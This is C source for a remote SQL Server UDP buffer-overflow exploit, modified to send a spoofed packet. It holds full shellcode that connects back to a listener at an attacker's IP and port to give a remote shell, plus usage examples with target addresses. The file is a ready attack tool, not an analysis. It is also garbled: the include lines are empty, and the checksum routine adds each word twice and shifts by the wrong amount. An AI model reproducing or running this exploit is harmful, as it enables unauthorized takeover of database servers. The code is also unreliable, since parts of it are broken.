/* SPOOFING version of sql server exploit! provided by johnqpublic2323@yahoo.com (there was no header when I found this) */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include unsigned short in_cksum(u_short *, int ); struct sockaddr_in c_sa; struct sockaddr_in s_sa; struct hostent *he; unsigned long addr; int SQLUDPPort=1434; char host[256]=""; char request[4000]="\x04"; int explen=361; int len; char exploit_code[362]= "\x55\x8B\xEC\x68\x18\x10\xAE\x42\x68\x1C" "\x10\xAE\x42\xEB\x03\x5B\xEB\x05\xE8\xF8" "\xFF\xFF\xFF\xBE\xFF\xFF\xFF\xFF\x81\xF6" "\xAE\xFE\xFF\xFF\x03\xDE\x90\x90\x90\x90" "\x90\x33\xC9\xB1\x44\xB2\x58\x30\x13\x83" "\xEB\x01\xE2\xF9\x43\x53\x8B\x75\xFC\xFF" "\x16\x50\x33\xC0\xB0\x0C\x03\xD8\x53\xFF" "\x16\x50\x33\xC0\xB0\x10\x03\xD8\x53\x8B" "\x45\xF4\x50\x8B\x75\xF8\xFF\x16\x50\x33" "\xC0\xB0\x0C\x03\xD8\x53\x8B\x45\xF4\x50" "\xFF\x16\x50\x33\xC0\xB0\x08\x03\xD8\x53" "\x8B\x45\xF0\x50\xFF\x16\x50\x33\xC0\xB0" "\x10\x03\xD8\x53\x33\xC0\x33\xC9\x66\xB9" "\x04\x01\x50\xE2\xFD\x89\x45\xDC\x89\x45" "\xD8\xBF\x7F\x01\x01\x01\x89\x7D\xD4\x40" "\x40\x89\x45\xD0\x66\xB8\xFF\xFF\x66\x35" "\xFF\xCA\x66\x89\x45\xD2\x6A\x01\x6A\x02" "\x8B\x75\xEC\xFF\xD6\x89\x45\xEC\x6A\x10" "\x8D\x75\xD0\x56\x8B\x5D\xEC\x53\x8B\x45" "\xE8\xFF\xD0\x83\xC0\x44\x89\x85\x58\xFF" "\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45" "\x84\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98" "\x8D\xBD\x48\xFF\xFF\xFF\x57\x8D\xBD\x58" "\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83" "\xC0\x01\x50\x83\xE8\x01\x50\x50\x8B\x5D" "\xE0\x53\x50\x8B\x45\xE4\xFF\xD0\x33\xC0" "\x50\xC6\x04\x24\x61\xC6\x44\x24\x01\x64" "\x68\x54\x68\x72\x65\x68\x45\x78\x69\x74" "\x54\x8B\x45\xF0\x50\x8B\x45\xF8\xFF\x10" "\xFF\xD0\x90\x2F\x2B\x6A\x07\x6B\x6A\x76" "\x3C\x34\x34\x58\x58\x33\x3D\x2A\x36\x3D" "\x34\x6B\x6A\x76\x3C\x34\x34\x58\x58\x58" "\x58\x0F\x0B\x19\x0B\x37\x3B\x33\x3D\x2C" "\x19\x58\x58\x3B\x37\x36\x36\x3D\x3B\x2C" "\x58\x1B\x2A\x3D\x39\x2C\x3D\x08\x2A\x37" "\x3B\x3D\x2B\x2B\x19\x58\x58\x3B\x35\x3C" "\x58"; int main(int argc, char **argv) { int s; unsigned long lsaddr,ldaddr; char ipaddress[40]=""; unsigned short port = 0; unsigned int ip = 0; char *ipt=""; char buffer[400]=""; unsigned short prt=0; char *prtt=""; if(argc != 2 && argc != 6) { printf("===============================================================\r\n"); printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n"); printf("Modified from \"Advanced Windows Shellcode\"\r\n"); printf("Code by David Litchfield, david@ngssoftware.com\r\n"); printf("Modified by lion, fix a bug.\r\n"); printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n"); printf("heh -wirepair now with spoofiliciousness, try using victims dns server for spoof ip.\n"); printf("Usage:\r\n"); printf(" %s Target [ ]\r\n\n", argv[0]); printf("Example:\r\n"); printf(" nc -l -p 53\r\n"); printf("Target is MSSQL SP 0:\r\n"); printf(" %s 192.168.0.1 192.168.7.1 53 0 215.34.234.235\r\n",argv[0]); printf("Target is MSSQL SP 1 or 2:\r\n"); printf(" %s 192.168.0.1 192.168.7.1 53 1 62.2.3.4\r\n\n", argv[0]); return 0; } strncpy(host, argv[1], 100); strncpy(ipaddress, argv[2], 36); port = atoi(argv[3]); if(argv[4][0] == 0x30) { printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n"); exploit_code[9]=0x10; } else { printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n"); } strcpy(buffer,exploit_code); ip = inet_addr(ipaddress); ipt = (char*)&ip; buffer[142]=ipt[0]; buffer[143]=ipt[1]; buffer[144]=ipt[2]; buffer[145]=ipt[3]; prt = htons(port); prt = prt ^ 0xFFFF; prtt = (char *) &prt; buffer[160]=prtt[0]; buffer[161]=prtt[1]; strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX"); strcat(request,"\xDC\xC9\xB0\x42"); strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46"); strcat(request,"\x01\x70\xAE\x42"); strcat(request,"\x01\x70\xAE\x42"); strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90"); len = strlen(request)+ explen; memcpy(request+strlen(request), buffer, explen); s = socket(AF_INET,SOCK_RAW,IPPROTO_RAW); if (s == -1) { printf("Couldnt open Raw socket!!\n"); exit(0); } lsaddr = inet_addr(argv[5]); ldaddr = inet_addr(argv[1]); printf("b0ing\n"); sendudp(s,&lsaddr,&ldaddr,53,1434,request,len); return 0; } int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len) { char recvbuf[64000]; char *packet; int ret; struct sockaddr_in client; struct iphdr *ip; struct udphdr *udp; packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len); memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len); if (packet == NULL) { printf("Malloc failed\n"); exit(-1); } ip = (struct iphdr *)packet; udp = (struct udphdr *)(packet+sizeof(struct iphdr)); ip->saddr = *saddr; ip->daddr = *daddr; ip->version = 4; ip->ihl = 5; ip->ttl = 255; ip->id = htons((unsigned short) rand()); ip->protocol = IPPROTO_UDP; ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len); ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr)); udp->source = htons(sport); udp->dest = htons(dport); udp->len = htons(sizeof(struct udphdr) + len); memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len); client.sin_family = AF_INET; client.sin_addr.s_addr = *daddr; ret = sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&client,sizeof(struct sockaddr_in)); free(packet); if ( ret < 0) { perror("sendto"); exit(1); } printf("Packet sent!\r\n"); printf("If you don't have a shell it didn't work.\r\n"); ret = read(sock, &recvbuf, sizeof(recvbuf)); return(0); } unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 17) + (sum & 0xffff); sum += (sum >> 17); answer = -sum; return (answer); }